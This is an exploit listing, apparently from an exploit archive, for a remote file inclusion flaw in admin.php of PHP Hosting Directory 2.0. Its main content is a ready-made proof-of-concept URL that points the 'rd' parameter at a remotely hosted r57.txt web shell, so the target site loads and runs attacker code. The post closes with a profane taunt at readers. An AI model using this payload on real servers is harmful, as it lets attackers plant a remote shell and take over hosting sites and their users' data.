id: 3471
date: 07/28/2008
title: PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability
author: RoMaNcYxHaCkEr
cves: 

==========================================================
PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability
==========================================================



# Name Of Script : PHP Hosting Directory 2.0 
# Download From : http://jnshosts.com/download/phphost_directory.zip
# Found By : RoMaNcYxHaCkEr
# Type Of Exploit : RFI
# P.O.C. : http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?
# Good Luck
# Note : If You Lamerz , Kidz Or Snitch Just I Said For You (Fuck You)



#  0day.today [2023-03-22]  #